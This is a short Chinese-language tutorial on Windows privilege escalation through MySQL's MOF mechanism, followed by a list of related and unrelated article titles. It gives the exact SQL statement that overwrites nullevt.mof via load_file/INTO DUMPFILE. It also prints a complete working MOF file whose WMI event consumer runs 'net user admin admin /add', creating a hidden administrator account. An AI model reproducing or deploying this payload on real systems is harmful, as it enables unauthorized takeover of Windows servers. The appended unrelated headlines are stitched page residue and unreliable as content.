mof提权的原理:

mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。

以下是mof提权的过程:

将mof上传至任意可读可写目录下,这里我传到D:\wamp\下命名为:xishaonian.mof。也就是:D:\wamp\xishaonian.mof

然后使用sql语句将系统当中默认的nullevt.mof给替换掉。进而让系统执行我们这个恶意的mof文件。

替换的sql语句:select load_file('D:\wamp\xishaonian.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

mof文件代码如下所示:

#pragma namespace("\\\\.\\root\\subscription") instance of __EventFilter as $EventFilter
{ EventNamespace = "Root\\Cimv2"; Name  = "filtP2"; Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa \"Win32_LocalTime\" " "And TargetInstance.Second = 5"; QueryLanguage = "WQL";
}; instance of ActiveScriptEventConsumer as $Consumer
{ Name = "consPCSV2"; ScriptingEngine = "JScript"; ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
}; instance of __FilterToConsumerBinding
{ Consumer   = $Consumer; Filter = $EventFilter;
};

可见其中是有一段添加用户的脚本。账号为admin 密码为admin

THE END

mof提权原理及其过程相关推荐

  1. mysql mof提权原理_mof提权原理及其过程

    mof提权的原理: mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就 ...

  2. mysql mof提权原理_[原创]WEB安全第六章提权篇12 mof提权

    WEB安全第六章提权篇12 mof提权 1.mof是什么 托管对象格式 (MOF) 文件是创建和注册提供程序.事件类别和事件的简便方法.在 MOF 文件中创建类实例和类定义后,可以对该文件进行编译.编 ...

  3. mysql mof提权原理_mof提权原理及实现

    关于 mof 提权的原理其实很简单,就是利用了c:/windows/system32/wbem/mof/目录下的 nullevt.mof文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的c ...

  4. mysql mof提权原理_关于mysql mof提权研究

    无意中看到有关mysql的这种提权方式,趁着有空余时间便研究了起来,发现网上有挺多地方写的不够详细的,研究的时候也卡壳了一段时间. 利用前提:操作系统为windows 操作系统版本不宜太高,2008测 ...

  5. mysql mof提权原理_(新安全原创精华)Mysql扩展文件MOF提权详讲

    本帖最后由 阿甫哥哥 于 2016-8-8 17:24 编辑 哈喽,大家好,我是0x_ALis,我代表新安全网络攻防研究室又来咱们的I春秋发精华帖子了. 希望大家可以支持我们,我们也会做得更好.无论是 ...

  6. mysql mof提权原理_Mof提权科普

    首先呢先谢谢米爷在我弄这个的时候把我骂开窍了- -. 不多说了~.~像名称一样哈~ 首先呢是朋友扔我一shell 他提权差就给咱了,简单的看了下,是php脚本的,一看php脚本就肯定带有,mysql. ...

  7. mysql mof提权原理_【提权】MySQL提权之MOF

    0x01 前言 Windows管理规范(WMI)提供了如下三种方法编译WMI存储库的托管对象格式(MOF)文件: 将MOF文件执行为命令行参数及Mofcomp.exe文件 使用IMofCompiler ...

  8. 113.网络安全渗透测试—[权限提升篇11]—[Windows 2003 Mysql MOF提权]

    我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 1.mof提权原理: 2.mof提权限制: 3.mof提权过程: (1)实验环境: (2)靶机链接: (3)实验 ...

  9. mysql mof提权_MySQL提权之mof提权

    mof提权原理 关于 mof 提权的原理其实很简单,就是利用了 c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次 ...

最新文章

  1. keepalived高可用集群技术介绍及实战演练
  2. linux mq发送测试消息,WebSphere MQ测试常用指令
  3. 移除指定的session
  4. 根据/proc/meminfo对空闲内存进行占用
  5. JavaSE面向对象-笔记
  6. yaml语法三大规则
  7. 四川大学本科教务系统 - 一键评教
  8. 游戏公司游戏策划面试笔记
  9. vs调试nuget包_NuGet包调试源码的方法
  10. 中国朝代历史,名字的简介
  11. 06 第三方之短信封装
  12. Unity3d简谐运动振屏效果实现
  13. C语言是一个什么样的语言
  14. 系统自带的最便捷的远程控制方法
  15. Windows起一个Docker镜像——起起起起起~不~来~
  16. fusion 360调整字体大小
  17. 理解pem pfx文件
  18. vdbench运行报错:java.net.NoRouteToHostException: No route to host (Host unreachable)
  19. opencv视频采集
  20. 从0开始一步一步部署walle

热门文章

  1. 神秘的Waymo一反常态,CVPR现场发布大型自动驾驶数据集
  2. 柳传志:华为采取自主研发,联想通过并购实现品牌国际化
  3. 俞敏洪:创业者应该避开的10个坑
  4. 人工智能:2018年发生了什么变化,2019年又将发生什么变化
  5. 科普长文揭秘生命为何会具有主观能动性
  6. 自动驾驶出行,进入下半场
  7. 牛津大学名誉教授Colin Blakemore:大脑是如何计算的?
  8. 物理学走到尽头了吗?
  9. 这10项创新技术正在引领零售业数字化转型
  10. 这几家公司有个梦想:开发AI操作系统,让外行也成为人工智能大师